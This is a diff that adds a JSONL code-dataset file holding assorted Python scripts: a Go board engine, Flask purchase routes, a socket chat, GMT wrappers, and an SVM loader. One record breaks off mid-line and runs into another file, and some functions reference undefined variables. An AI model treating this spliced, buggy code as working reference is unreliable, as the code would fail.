diff --git "a/2900.jsonl" "b/2900.jsonl" new file mode 100644--- /dev/null +++ "b/2900.jsonl" @@ -0,0 +1,614 @@ +{"seq_id":"70558639","text":"# Plotting, printing output, calling other function\nimport networkx as nx\nfrom itertools import product\nimport graphic as gr\nimport pm\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\nimport time\n\ndebug = False \n\nsize = pm.size\n\nG = nx.grid_graph([size,size])\n\ndef plot(board,turn,pos,player):\n\tstate = np.zeros((size,size))\n\tfor i,j in board[1]:\n\t\tstate[i][j] = 1\n\tfor i,j in board[2]:\n\t\tstate[i][j] = 2\n\n\t# Make this plot True to save image to disk\n\timg = gr.go(state, turn, points, pos, player, plot = True) # or you can pass points if you want to display area too\n\n\t# Make this True to see board state as a popup\n\tif(False):\n\t\t# Display board state\n\t\tplt.close()\n\t\tplt.imshow(img)\n\t\tplt.show(block=False)\n\n# capture pieces that that now covered due to move played at pos\ndef capture(player, boardTemp, pos):\n\tpieces = 0\n\n\t# no need to check\n\t# check if empty spaces nearby have been covered due to this move\n\tchanged = list(G.neighbors(pos))+[pos] # The only positions that can be effected\n\tfor n in changed:\n\t\t# consider the subgraph formed by pieces placed by enemy, what is the connected\n\t\t# component of node n in this subgraph\n\t\tenemy = 1 if player == 2 else 2\n\t\t\n\t\tsub = G.subgraph(boardTemp[enemy])\n\t\tif(n in sub):\n\t\t\tcc = nx.node_connected_component(sub,n)\n\t\t\tif(debug):\n\t\t\t\tprint(\"===\")\n\t\t\t\tprint(\"The connected components of \"+str(n)+\" in the following enemy subgraph is\")\n\t\t\t\tprint(sub)\n\t\t\t\tprint(cc)\n\t\t\t\tprint(\"the boundary for this cc is\")\n\t\t\tboundary = nx.node_boundary(G,cc) # get all the liberties of this CC of your enemy\n\t\t\t\n\t\t\t# check if you cover this cc\n\t\t\tif(boundary.issubset(set(boardTemp[player]))):\n\t\t\t\tif(debug):\n\t\t\t\t\tprint(\"The cc has been captured by you!!\")\n\t\t\t\tboardTemp[enemy] = [e for e in boardTemp[enemy] if e not in cc] # capture the pieces\n\t\t\t\tpoints[player] += len(cc) # update points\n\t\t\t\tpiecesCaptured[player] += len(cc)\n\t\t\t\tboardTemp[0] += list(cc) # update that new positions have been emptied up\n\t\t\t\tpieces += len(list(cc))\n\t\t\t\n\n\t\t# Optional Rule 7A NOT IN EFFECT - (Self-capture) is allowed\n\t\tsub = G.subgraph(boardTemp[player])\n\t\tif(n in sub):\n\t\t\tcc = nx.node_connected_component(sub,n)\n\t\t\tif(debug):\n\t\t\t\tprint(\"===\")\n\t\t\t\tprint(\"The connected components of \"+str(n)+\" in the player subgraph is\")\n\t\t\t\tprint(sub)\n\t\t\t\tprint(cc)\n\t\t\t\tprint(\"the boundary for this cc is\")\n\t\t\tboundary = nx.node_boundary(G,cc) # get all the liberties of this CC\n\t\t\t\n\t\t\tif(boundary.issubset(set(boardTemp[enemy]))):\n\t\t\t\tif(debug):\n\t\t\t\t\tprint(\"Your cc has been captured by SELF CAPTURE!!\")\n\t\t\t\tboardTemp[player] = [e for e in boardTemp[player] if e not in cc] # capture the pieces\n\t\t\t\tpoints[enemy] += len(cc) # update points\n\t\t\t\tpiecesCaptured[enemy] += len(cc)\n\t\t\t\tboardTemp[0] += list(cc) # update that new positions have been emptied up\n\t\t\t\tpieces -= len(list(cc))\n\n\treturn pieces\n\ndef updatePoints(player, boardTemp, pos):\n\t# check if empty spaces nearby have been covered due to this move\n\tchanged = list(G.neighbors(pos))+[pos]\n\tenemy = 1 if player == 2 else 2\n\n\treward = 0\n\n\t# if you fill in your already captured SINGLE point area\n\tfor oldArea in captured_area[player]:\n\t\tif((oldArea == set([pos]))):\n\t\t\tcaptured_area[player].remove(oldArea)\n\t\t\tpoints[player] -= len(oldArea)\n\t\t\treward -= len(oldArea)\n\n\t# if you capture an enemy by filling in the single point they used to hold\n\tfor oldArea in captured_area[enemy]:\n\t\tif((oldArea == set([pos]))):\n\t\t\tcaptured_area[enemy].remove(oldArea)\n\t\t\t# no need to update reward since the blank area thus formed will have player as boundary\n\t\t\tpoints[enemy] -= len(oldArea)\n\n\tfor n in changed:\n\t\tsub = G.subgraph(boardTemp[0])\n\t\tif(n in sub):\n\t\t\tcc = nx.node_connected_component(sub,n)\n\t\t\tif(debug):\n\t\t\t\tprint(\"===\")\n\t\t\t\tprint(\"The connected components of \"+str(n)+\" in the subgraph of empty spaces is\")\n\t\t\t\tprint(sub)\n\t\t\t\tprint(cc)\n\n\t\t\tboundary = nx.node_boundary(G,cc)\n\t\t\tif(boundary.issubset(set(boardTemp[enemy]))):\n\t\t\t\tnot_tabulated = True\n\t\t\t\tif(debug):\n\t\t\t\t\tprint(\"This cc is covered by player \"+str(enemy))\n\t\t\t\tfor oldArea in captured_area[enemy]:\n\t\t\t\t\tif(cc.issubset(oldArea)):\n\t\t\t\t\t\t# old territory can shrink, should run only once for a single oldArea\n\t\t\t\t\t\tcaptured_area[enemy].remove(oldArea)\n\t\t\t\t\t\tpoints[enemy] -= len(oldArea)\n\t\t\t\t\t\treward += len(oldArea)\n\t\t\t\t\t\t\n\t\t\t\t\t\tcaptured_area[enemy].append(cc)\n\t\t\t\t\t\tpoints[enemy] += len(cc)\n\t\t\t\t\t\treward -= len(cc)\n\n\t\t\t\t\t\tnot_tabulated = False\n\t\t\t\t\t\tif(debug):\n\t\t\t\t\t\t\tprint(\"cc is a subset of Old area ->\")\n\t\t\t\t\t\t\tprint(oldArea)\n\n\t\t\t\tif(not_tabulated):\n\t\t\t\t\tcaptured_area[enemy].append(cc)\n\t\t\t\t\tpoints[enemy] += len(cc)\n\t\t\t\t\treward -= len(cc) # since enemy gained\n\t\t\t\t\tif(debug):\t\n\t\t\t\t\t\tprint(\"fresh entry into captured_area\")\n\n\t\t\telif(boundary.issubset(set(boardTemp[player]))):\n\t\t\t\tnot_tabulated = True\n\t\t\t\tif(debug):\n\t\t\t\t\tprint(\"This cc is covered by player \"+str(player))\n\n\t\t\t\tfor oldArea in captured_area[player]:\n\t\t\t\t\tif(cc.issubset(oldArea)):\n\t\t\t\t\t\t# old territory can shrink,\n\t\t\t\t\t\tcaptured_area[player].remove(oldArea)\n\t\t\t\t\t\tpoints[player] -= len(oldArea)\n\t\t\t\t\t\treward -= len(oldArea)\n\n\t\t\t\t\t\tcaptured_area[player].append(cc)\n\t\t\t\t\t\tpoints[player] += len(cc)\n\t\t\t\t\t\treward += len(cc)\n\n\t\t\t\t\t\tnot_tabulated = False\n\t\t\t\t\t\tif(debug):\n\t\t\t\t\t\t\tprint(\"cc is a subset of Old area ->\")\n\t\t\t\t\t\t\tprint(oldArea)\n\n\t\t\t\tif(not_tabulated):\n\t\t\t\t\tcaptured_area[player].append(cc)\n\t\t\t\t\tpoints[player] += len(cc)\n\t\t\t\t\treward += len(cc)\n\t\t\t\t\tif(debug):\n\t\t\t\t\t\tprint(\"fresh entry into captured_area\")\n\t\t\telse:\n\t\t\t\t# if this connected commponent is now under contention\n\t\t\t\t# we need to remove it from captured_area if it used to exist.\n\t\t\t\tfor oldArea in captured_area[player]:\n\t\t\t\t\tif(cc.issubset(oldArea)):\n\t\t\t\t\t\t# old territory can shrink!! no new owner\n\t\t\t\t\t\tcaptured_area[player].remove(oldArea)\n\t\t\t\t\t\tpoints[player] -= len(oldArea)\n\t\t\t\t\t\treward -= len(oldArea)\n\n\t\t\t\tfor oldArea in captured_area[enemy]:\n\t\t\t\t\tif(cc.issubset(oldArea)):\n\t\t\t\t\t\t# old territory can shrink!! no new owner\n\t\t\t\t\t\tcaptured_area[enemy].remove(oldArea)\n\t\t\t\t\t\tpoints[enemy] -= len(oldArea)\n\t\t\t\t\t\treward += len(oldArea)\n\tif(debug):\n\t\tprint(\"\\n\\nPlayer \"+str(player)+\" played at position \"+str(pos)+\" and got a reward of \")\n\treturn reward\n\n\t# One more case is if the single blank spot is now taken over by a colored piece\n\t# no longer blank so, no subgraph formed.\n\tfor oldArea in captured_area[player]:\n\t\tif(oldArea == set([pos])):\n\t\t\tcaptured_area[player].remove(oldArea)\n\t\t\tpoints[player] -= len(oldArea)\n\tfor oldArea in captured_area[enemy]:\n\t\tif(oldArea == set([pos])):\n\t\t\tcaptured_area[enemy].remove(oldArea)\n\t\t\tpoints[enemy] -= len(oldArea)\n\n# player can be 1 or 2, white or black, pos is a tuple of (i,j)\ndef play(player, pos, boardTemp):\n\t# ensure these variables is treated as a global variable\n\tglobal board, turn \n\tboard = boardTemp\n\n\tif(debug):\t\n\t\tprint(\"\\n\\nTurn Number \"+ str(turn) +\" player \"+str(player)+\" is trying to play at position \"+str(pos))\n\t\tprint(points)\n\t\n\t# check if position is free of any other piece\n\tif(pos in board[0]):\n\t\t#boardTemp = board # making copy might take time? needed for Rule 8\n\t\tboardTemp[0].remove(pos)\n\t\tboardTemp[player].append(pos)\n\t\trewardPieces = capture(player, boardTemp, pos)\n\t\trewardArea = updatePoints(player, boardTemp, pos)\n\t\tif(debug):\n\t\t\tprint(str(rewardArea+rewardPieces))\n\n\t\t# Rule 8 Prohibition of repetition TO DO\n\t\thist.append(boardTemp)\n\t\tboard = boardTemp\n\t\tplot(board,turn,pos,player)\n\t\tif(debug):\t\n\t\t\tprint(\"\\n\\nThe following is the captured area currently\")\n\t\t\tprint(captured_area)\n\t\tturn += 1\n\t\treturn (board, rewardArea+rewardPieces)\n\tif(debug):\n\t\tprint(\"You can only play on empty positions\")\n\treturn (board, -1*size*size) # is this sufficient penalty?\n\nboard = {1:[], 2:[]}\npoints = {1:0, 2:0} # pieces captured + total area under control right now \npiecesCaptured = {1:0, 2:0}\n\n# list of sets of nodes currently under control of respective player\ncaptured_area = { 1:[], 2:[]}\n\nturn = 1\nhist = [] # history of board positions\n\nboard[0] = list(set(list(product(range(size), repeat = 2))))\n\n# dictionary to matrix representation\ndef boardToState(b):\n\tstate = np.zeros((size,size))\n\tfor i,j in b[1]:\n\t\tstate[i][j] = 1\n\tfor i,j in b[2]:\n\t\tstate[i][j] = 2\n\treturn state\n\n# state is a numpy matrix of n,n 'action' is a position to play by 'player' [0,n^2-1], player is 1 or 2 depending on white or black\ndef go(state, action, player):\n\ty, x = gr.location_to_cordinate([action],size = pm.size, box = 1)[0]\n\taction = (x,y)\n\n\tb = {0:[], 1:[], 2:[]}\n\tfor i in range(size):\n\t\tfor j in range(size):\n\t\t\tif(state[i][j] == 0):\n\t\t\t\tb[0].append((i,j))\n\t\t\telif(state[i][j] == 1):\n\t\t\t\tb[1].append((i,j))\n\t\t\telif(state[i][j] == 2):\n\t\t\t\tb[2].append((i,j))\n\n\tif(debug):\n\t\tprint(board)\n\ts2, reward = play(player,action, b)\n\treturn boardToState(s2), reward\n\n''' Normal human play '''\ndef humanPlay(randomStart = False):\n\tif(randomStart):\n\t\ttotal = list(set(list(product(range(size), repeat = 2))))\n\n\t\tboard[1] = random.sample(total,size*size//3)\n\t\tboard[2] = random.sample(list(set(total) - set(board[1])),size*size//3)\n\t\t# initially all positions belong to blank - set(board[1]) - set(board[2]))\n\t\tboard[0] = list(set(total) - set(board[1]) - set(board[2]))\n\telse:\n\t\tboard = {1:[], 2:[]}\n\t\tboard[0] = list(set(list(product(range(size), repeat = 2))))\n\n\tmove = 'y'\n\tplayer = 2\n\t\t\n\twhile(move!='q'):\n\t\tmove = input()\n\t\tif(not(play(player%2+1, tuple(map(int,move.split(' ')))))):\n\t\t\tcontinue # invalid move same player tries again\n\t\tplayer += 1 \n\n\n\ndef randAgents():\n\tgameNumber = 0\n\n\t# Number of games to be played\n\tfor i in range(100000):\n\t\ttext_file = open(pm.myHomeFolder + \"\\\\data\\\\gameNumber\"+str(gameNumber)+\".txt\", \"w\")\n\t\tplayer = 1\n\t\tgameNumber += 1\n\n\t\tboard = {1:[], 2:[]}\n\t\tpoints = {1:0, 2:0}\n\t\tturn = 0 \n\t\thist = [] # history of board positions\n\n\t\t# initially all positions belong to blank - set(board[1]) - set(board[2]))\n\t\tboard[0] = list(set(list(product(range(size), repeat = 2))))\n\t\t\n\t\twhile(turn>>>>>>>>>>>>>>>>\", kitchen_purchases, brand_purchases)\n\n total_purchases = KitchenStockPurchase.get_total_price(KitchenStockPurchase, purchases=kitchen_purchases) + Purchase.get_total_price(Purchase, purchases=brand_purchases)\n\n return render_template(\"manager/purchases.html\", mod=module, kitchen_purchases=kitchen_purchases, total_purchases=total_purchases, kitchen_items=kitchen_items, drink_items=drink_items, item_id=item, brand_purchases=brand_purchases, tomorrow=to, today=_from)\n\n\n@purchase.route('/delete-purchase', methods=[\"POST\"])\n@login_required\ndef delete_purchase():\n purchase_id = request.form[\"purchase-id\"]\n purchase = Purchase.read_one(Purchase, purchase_id)\n Purchase.delete(purchase)\n session.close()\n flash(\"Purchase (\"+ purchase_id +\") was deleted successfully\", \"info\")\n return redirect(url_for('purchase.get_purchases'))\n\n\n@purchase.route('/delete-kitchen-purchase', methods=[\"POST\"])\n@login_required\ndef delete_kitchen_purchase():\n purchase_id = request.form[\"kitchen-purchase-id\"]\n purchase = KitchenStockPurchase.read_one(KitchenStockPurchase, purchase_id)\n KitchenStockPurchase.delete(purchase)\n session.close()\n flash(\"Kitchen Purchase (\"+ purchase_id +\") was deleted successfully\", \"info\")\n return redirect(url_for('purchase.get_purchases'))","sub_path":"Application/blueprints/Purchase/purchase.py","file_name":"purchase.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"593625302","text":"#remove, clear\n\n\n#리스트를 선언\nlist_a = [1 ,2, 3, 4 ,5, 6]\nlist_b = [1 ,2, 3, 4 ,5, 6]\nlist_c = [1 ,2, 3, 4 ,5, 6]\nlist_d = [1 ,2, 3, 4 ,5, 6]\n#제거 방법1---0번 1번 2번 3번 4번 5번 중 1번칸 제거\ndel list_a[1]\nprint(\"del list_a[1]:\",list_a)\n\n#제거방법 pop------2번칸 제거\nlist_b.pop(2)\nprint(\"pop(2):\",list_b)\n\n#remove-----특정 값 제거 \nlist_c.remove(3) #(\"제거할 값\")\nlist_c\n\n\n#clear\nlist_d.clear()\nprint(\"clear:\",list_d)\n\n\n","sub_path":"Python/list_remove_clear.py","file_name":"list_remove_clear.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"285189208","text":"import socket\nimport os\nimport threading\n\ndef receive(connection):\n while True:\n buff = connection.recv(4096)\n message = buff.decode()\n print(\"Friend: \" + message)\n\n\n\nprint(\"-----------------------------\")\nprint(\"Would you like to connect to somebody or wait for connection?\\n1 Connect to Somebody\\n2 Wait for Connection\")\ndecinput = input()\nif decinput == str(1):\n \n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n path = os.getcwd()\n print(\"-----------------------------\")\n print(\"To Connect, Use \\\"connect \\\"\")\n connectflag = False\n while True:\n cmd_input = input()\n if cmd_input.split(' ')[0] == \"connect\" and connectflag == False:\n client.connect((cmd_input.split(' ')[1], int(cmd_input.split(' ')[2])))\n connectflag = True\n t1 = threading.Thread(target=receive, args=(client,))\n t1.start()\n print(\"-Connected to another person!\")\n print(\"-----------------------------\")\n print(\"-Send messages by typing into the command line!\\n-Ctrl-C to quit\")\n \n if cmd_input.split(' ')[0] != \"connect\":\n client.sendall(bytes(cmd_input, 'UTF-8'))\n #print(\"You: \" + cmd_input)\n \nelif decinput == str(2):\n LOCALHOST = \"127.0.0.1\"\n PORT = 8085\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind((LOCALHOST, PORT))\n server.listen(10)\n print(\"Waiting for peer to connect\")\n msg = ''\n path = os.getcwd()\n clientConnection, clientAddress = server.accept()\n print(\"Connected peer :\", clientAddress)\n t1 = threading.Thread(target=receive, args=(clientConnection,))\n t1.start()\n while True:\n msginput = input()\n clientConnection.send(bytes(msginput, \"UTF-8\"))\n #print(\"You: \" + msginput)\n\n print(\"Peer disconnected...\")\n clientConnection.close()\n\n","sub_path":"peer2.py","file_name":"peer2.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"67093572","text":"import cx_Freeze\r\nimport sys\r\n\r\nsys.argv.append(\"build\")\r\n\r\nexecutables = [cx_Freeze.Executable(\"GAME1_2.py\")]\r\ncx_Freeze.setup(\r\n name = \"GAME1\",\r\n options = {\"build_exe\":{\"packages\":[\"pygame\"],\"include_files\":['racecar.png','car_icon.png','Crash.wav','Jazz_In_Paris.wav']}},\r\n executables = executables\r\n )\r\n","sub_path":"Python/game 1_version 2/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"633504895","text":"### gmtfun.py\n##\n## Copyright (c) 2010 - 2020 CIRES Coastal DEM Team\n##\n## Permission is hereby granted, free of charge, to any person obtaining a copy \n## of this software and associated documentation files (the \"Software\"), to deal \n## in the Software without restriction, including without limitation the rights \n## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies \n## of the Software, and to permit persons to whom the Software is furnished to do so, \n## subject to the following conditions:\n##\n## The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n##\n## THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, \n## INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR \n## PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE \n## FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, \n## ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n##\n### Code:\n\nfrom utils import *\n\ndef gmt_inc2inc(inc_str):\n units = inc_str[-1]\n\n if units == 'c': ## arc-seconds (old)\n inc = float(inc_str[:-1]) / 3600\n elif units == 's': ## arc-seconds\n inc = float(inc_str[:-1]) / 3600\n elif units == 'm': ## arc-minutes\n inc = float(inc_str[:-1]) / 360\n else: inc = float(inc_str) \n \n return(inc)\n\n## =============================================================================\n##\n## GMT Wrapper Functions - gmtfun.py\n## wrapper functions to GMT system commands\n##\n## =============================================================================\n\ndef gmt_inf(src_xyz):\n '''generate an info (.inf) file from a src_xyz file using GMT.'''\n if os.path.exists(src_grd):\n return(run_cmd('gmt gmtinfo {} -C > {}.inf'.format(src_xyz, src_xyz), verbose = False))\n else: return(None)\n\ndef gmt_grd_inf(src_grd):\n '''generate an info (.inf) file from a src_grd file using GMT.'''\n if os.path.exists(src_grd):\n return(run_cmd('gmt grdinfo {} -C > {}.inf'.format(src_grd, src_grd), verbose = False))\n else: return(None)\n\ndef gmt_grd2gdal(src_grd, dst_fmt = 'GTiff', epsg = 4326, verbose = False):\n '''Convert the grd file to tif using GMT'''\n if os.path.exists(src_grd):\n dst_gdal = '{}.{}'.format(os.path.basename(src_grd).split('.')[0], gdalfun._fext(dst_fmt))\n grdc_cmd = ('gmt grdconvert {} {}=gd+n-9999:{} -V\\\n '.format(src_grd, dst_gdal, dst_fmt))\n out, status = run_cmd(grdc_cmd, verbose = verbose)\n if status != 0: dst_gdal = None\n else: dst_gdal = None\n return(dst_gdal)\n\ndef grdinfo(src_grd, verbose = False):\n '''Return an info list of `src_grd`'''\n out, status = run_cmd('gmt gmtset IO_COL_SEPARATOR = SPACE', verbose = verbose)\n if os.path.exists(src_grd):\n grdinfo_cmd = ('gmt grdinfo {} -C'.format(src_grd))\n out, status = run_cmd(grdinfo_cmd, verbose = verbose)\n remove_glob('gmt.conf')\n if status == 0:\n return(out.split())\n else: return(None)\n else: return(None)\n\ndef gmtinfo(src_xyz, verbose = False):\n '''Return an info list of `src_xyz`'''\n out, status = run_cmd('gmt gmtset IO_COL_SEPARATOR = SPACE', verbose = verbose)\n if os.path.exists(src_xyz):\n gmtinfo_cmd = ('gmt gmtinfo {} -C'.format(src_xyz))\n out, status = run_cmd(gmtinfo_cmd, verbose = verbose)\n remove_glob('gmt.conf')\n if status == 0:\n return(out.split())\n else: return(None)\n else: return(None)\n\ndef gmt_block(datalist, mode = 'blockmean', inc = '1s', o_name = None, delim = 'SPACE', weights = False, verbose = False):\n '''run block/mean/median on src_xyz'''\n if mode == 'blockmean' or mode == 'blockmean':\n out, status = run_cmd('gmt gmtset IO_COL_SEPARATOR = {}'.format(delim.upper()), verbose = verbose)\n if mode == 'blockmean' and weights:\n mode = 'blockmean -Wi'\n datalist.want_weights = True\n if mode == 'blockmedian': mode = 'blockmedian -Q'\n if o_name is None: o_name = datalist._name\n if delim.lower() == 'comma':\n out_ext = 'csv'\n o_vrt = open('{}.vrt'.format(o_name), 'w')\n t = '''\n \n {}.csv\n wkbPoint\n \n \n'''.format(o_name, o_name)\n o_vrt.write(t)\n o_vrt.close()\n\n else: out_ext = 'xyz'\n \n if os.path.exists(datalist._path):\n blk_cmd1 = ('gmt {} -V {} -I{} > {}.{}'.format(mode, datalist.region.gmt, inc, o_name, out_ext))\n out, status = run_cmd(blk_cmd1, verbose = True, data_fun = datalist._dump_data)\n else: status = -1\n else: status = -1\n remove_glob('gmt.conf')\n \n return(status)\n \ndef gmtselect_split(o_xyz, sub_region, sub_bn, verbose = False):\n '''split an xyz file into an inner and outer region.'''\n\n status = 0\n out_inner = None\n out_outer = None\n\n gmt_s_inner = 'gmt gmtselect -V {} {} > {}_inner.xyz'.format(o_xyz, sub_region.gmt, sub_bn)\n out, status = run_cmd(gmt_s_inner, verbose = verbose)\n\n if status == 0: out_inner = '{}_inner.xyz'.format(sub_bn)\n\n gmt_s_outer = 'gmt gmtselect -V {} {} -Ir > {}_outer.xyz'.format(o_xyz, sub_region.gmt, sub_bn)\n out, status = run_cmd(gmt_s_outer, verbose = verbose)\n\n if status == 0: out_outer = '{}_outer.xyz'.format(sub_bn)\n\n return([out_inner, out_outer])\n \ndef grdcut(src_grd, src_region, dst_grd, verbose = False):\n '''Cut `src_grd` to `src_region` '''\n\n status = 0\n if os.path.exists(src_grd):\n cut_cmd1 = ('gmt grdcut -V {} -G{} {}'.format(src_grd, dst_grd, src_region.gmt))\n out, status = run_cmd(cut_cmd1, verbose = verbose)\n else: status = -1\n\n return(status)\n\ndef grdfilter(src_grd, dst_grd, dist = '3s', verbose = False):\n '''filter `src_grd` '''\n\n status = 0\n if os.path.exists(src_grd):\n ft_cmd1 = ('gmt grdfilter -V {} -G{} -R{} -Fc{} -D1'.format(src_grd, dst_grd, src_grd, dist))\n out, status = run_cmd(ft_cmd1, verbose = verbose)\n else: status = -1\n\n return(status)\n\ndef grd2xyz(src_grd, dst_xyz, region = None, mask = None, verbose = False, want_datalist = False):\n '''Convert `src_grd` to xyz possibly using a nodata mask and/or a region.\n Optionally, generate a datalist and inf file for the resultant xyz data.'''\n\n status = 0\n if mask:\n grdmask_cmd = ('gmt grdmath -N -V {} {} OR = tmp.grd'.format(src_grd, mask))\n out, status = run_cmd(grdmask_cmd, verbose = verbose)\n if status == 0: \n src_grd = 'tmp.grd'\n\n if region and region._valid:\n region_str = region.gmt\n else: region_str = ''\n\n grd2xyz_cmd = ('gmt grd2xyz -V {} -s {} > {}'.format(src_grd, region_str, dst_xyz))\n out, status = run_cmd(grd2xyz_cmd, verbose = verbose)\n\n if status == 0:\n if mask:\n if os.path.exists('tmp.grd'):\n os.remove('tmp.grd')\n\n if want_datalist:\n s_datalist = datalist('{}.datalist'.format(dst_xyz.split('.')[0]))\n s_datalist._append_datafile(['{}'.format(os.path.basename(dst_xyz)), 168, 1])\n s_datalist._reset()\n\n mb_inf(s_datalist._path, -1)\n \n return(status)\n\ndef slope(src_dem, dst_slp, verbose = False):\n '''Generate a Slope grid from a DEM with GMT'''\n\n status = 0\n o_b_name = '{}'.format(src_dem.split('.')[0])\n\n slope_cmd0 = ('gmt grdgradient -V -fg {} -S{}_pslp.grd -D -R{}\\\n '.format(src_dem, o_name, src_dem))\n out, status = run_cmd(slope_cmd0, verbose = verbose)\n\n if status == 0:\n slope_cmd1 = ('gmt grdmath -V {}_pslp.grd ATAN PI DIV 180 MUL = {}\\\n '.format(o_b_name, dst_slp))\n out, status = run_cmd(slope_cmd1, verbose = verbose)\n \n if os.path.exists('{}_pslp.grd'.format(o_b_name)):\n os.remove('{}_pslp.grd'.format(o_b_name))\n\n return(status)\n\ndef num_msk(num_grd, dst_msk, verbose = False):\n '''Generate a num-msk from a NUM grid.'''\n\n status = 0\n\n num_msk_cmd = ('gmt grdmath -V {} 0 MUL 1 ADD 0 AND = {}\\\n '.format(num_grd, dst_msk))\n out, status = run_cmd(num_msk_cmd, verbose = verbose)\n\n return(status)\n\ndef xyz2grd(datalist, region, inc, dst_name, a = 'n', node = 'pixel', verbose = False):\n '''Run the GMT command `xyz2grd` given a datalist, region and increment.'''\n \n status = 0\n if node == 'pixel':\n reg_str = '-r'\n else: reg_str = ''\n \n num_cmd0 = ('gmt xyz2grd -V {} -I{:.10f} -G{} -A{} {}\\\n '.format(region.gmt, inc, dst_name, a, reg_str))\n out, status = run_cmd(num_cmd0, verbose = verbose, data_fun = datalist._dump_data)\n\n return(out, status)\n### End\n","sub_path":"geomods-old/gmtfun.py","file_name":"gmtfun.py","file_ext":"py","file_size_in_byte":9042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"455126338","text":"from PIL import Image, ImageDraw, ImageFont, ImageFile\n\nclass Drawing:\n\tdef __init__(self, g_map=\"\", *args, **kwargs):\n\t\tself.mark_map = g_map\n\n\tdef hello_world(self):\n\t\t# get an image\n\t\tbase = Image.open(self.mark_map).convert('RGBA')\n\n\t\t# make a blank image for the text, initialized to transparent text color\n\t\ttxt = Image.new('RGBA', base.size, (255,255,255,0))\n\n\t\t# get a font\n\t\tfnt = ImageFont.truetype('FreeMono.ttf', 40)\n\t\t# get a drawing context\n\t\td = ImageDraw.Draw(txt)\n\n\t\t# draw text, half opacity\n\t\td.text((10,10), \"Hello\", font=fnt, fill=(255,255,255,128))\n\t\t# draw text, full opacity\n\t\td.text((10,60), \"World\", font=fnt, fill=(255,255,255,255))\n\n\t\tout = Image.alpha_composite(base, txt)\n\n\t\tout.save(self.mark_map)","sub_path":"Python/Capstone/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"377250710","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nLoads pretrained final SVM\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.keras.models import Model\r\nfrom sklearn.externals import joblib\r\n\r\ndef get_subSVM_outs(features, data, subSVMs, number_of_classes):\r\n feature1_train, feature1_test,\\\r\n feature2_train, feature2_test,\\\r\n feature3_train, feature3_test = features\r\n \r\n X_train, y_train, X_test, y_test = data\r\n \r\n subSVM1, subSVM2, subSVM3 = subSVMs\r\n \r\n subSVM1_train_out = np.zeros((y_train.shape[0],number_of_classes))\r\n subSVM1_test_out = np.zeros((y_test.shape[0],number_of_classes))\r\n subSVM2_train_out = np.zeros((y_train.shape[0],number_of_classes))\r\n subSVM2_test_out = np.zeros((y_test.shape[0],number_of_classes))\r\n subSVM3_train_out = np.zeros((y_train.shape[0],number_of_classes))\r\n subSVM3_test_out = np.zeros((y_test.shape[0],number_of_classes))\r\n for i in range(number_of_classes):\r\n # predict_proba outputs 2 columns and m rows.\r\n # the 2 columns are as such: [prob of 0, prob of 1]\r\n # I will be taking the prob of 1 moving forward\r\n print(i)\r\n subSVM1_train_out[:,i] = subSVM1[i].predict_proba(feature1_train)[:,1]\r\n subSVM1_test_out[:,i] = subSVM1[i].predict_proba(feature1_test)[:,1]\r\n subSVM2_train_out[:,i] = subSVM2[i].predict_proba(feature2_train)[:,1]\r\n subSVM2_test_out[:,i] = subSVM2[i].predict_proba(feature2_test)[:,1]\r\n subSVM3_train_out[:,i] = subSVM3[i].predict_proba(feature3_train)[:,1]\r\n subSVM3_test_out[:,i] = subSVM3[i].predict_proba(feature3_test)[:,1]\r\n \r\n subSVM_concat_train_out = np.hstack([subSVM1_train_out, subSVM2_train_out, subSVM3_train_out])\r\n subSVM_concat_test_out = np.hstack([subSVM1_test_out, subSVM2_test_out, subSVM3_test_out])\r\n \r\n return subSVM_concat_train_out, subSVM_concat_test_out\r\n\r\ndef load(data, features, subSVMs, number_of_classes, get_accuracies='True'): \r\n X_train, y_train, X_test, y_test = data\r\n \r\n print('loading pre-trained final SVM model...')\r\n finalSVM = joblib.load('saved_finalSVM.pkl')\r\n \r\n if get_accuracies=='True':\r\n print('\\nFinding accuracies of trained final SVM')\r\n subSVM_concat_train_out,\\\r\n subSVM_concat_test_out = get_subSVM_outs(features, data, subSVMs, number_of_classes)\r\n \r\n accuracy_test = [] \r\n accuracy_train = []\r\n \r\n for i in range(number_of_classes):\r\n print('final SVM model, number:',i)\r\n # predicted train and test values for a certain number, i \r\n yhat1_train = finalSVM[i].predict(subSVM_concat_train_out)\r\n print(yhat1_train.shape)\r\n print(yhat1_train)\r\n yhat1_test = finalSVM[i].predict(subSVM_concat_test_out)\r\n # test and train accuracies for that number\r\n accte = np.mean(yhat1_test == y_test[:,i])\r\n acctr = np.mean(yhat1_train == y_train[:,i])\r\n accuracy_test.append(accte)\r\n accuracy_train.append(acctr)\r\n \r\n # plotting individual SVMs\r\n x = np.arange(10)\r\n w = 0.3\r\n # training accuracy\r\n print('training 